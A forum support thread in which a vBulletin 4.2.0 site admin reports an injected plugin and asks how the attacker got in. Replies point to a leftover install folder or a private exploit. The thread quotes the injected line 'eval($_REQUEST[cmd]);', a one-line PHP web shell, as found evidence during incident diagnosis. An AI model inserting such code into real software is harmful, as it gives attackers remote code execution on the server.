Dangerous SQL injection vulnerability in 4:2:0?

[jfxcube]

This week we found a new plugin (we are still investigating about "how") with this code:

Code:

eval($_REQUEST[cmd]);

Apparently, in apache logs and vBulletin logs there is nothing.

Do you know any known issues about this vulnerability in vBulletin 4.2.0 l2?

Seems to be similar to this one:

http://www.pcworld.com/article/24555...erability.html

[Dave]

This isn't present in vBulletin by default. It's a piece of code implemented by a hacker or someone who wants to do bad stuff.

[jfxcube]

I knew that ................. i'm just asking if there is some known vulnerability in vbulletin 4.2.0 l2 that let bad guys do some sql injection in tables like plugin, so that i can save time investigating by myself to find the exploit used to inject that code.

[ForceHSS]

We don't know what plugins you have or if you have the install folder still in your FTP so its hard to answer. The best way would be to get someone to login and fix your problem if you don't know how to do it yourself

[Dave]

As far as I know there is no public exploit for vBulletin 4.2+, a private exploit is always possible or a vulnerable plugin.

[Paul M]

Quote:

Originally Posted by jfxcube

i'm just asking if there is some known vulnerability in vbulletin 4.2.0 l2 that let bad guys do some sql injection in tables like plugin.

No, there isnt.

[Zachery]

In 4.2? If you've left the install folder around, yes. If you haven't no.

[jfxcube]

Quote:

Originally Posted by Zachery

In 4.2? If you've left the install folder around, yes. If you haven't no.

It's the first thing i 've deleted after finishing installing it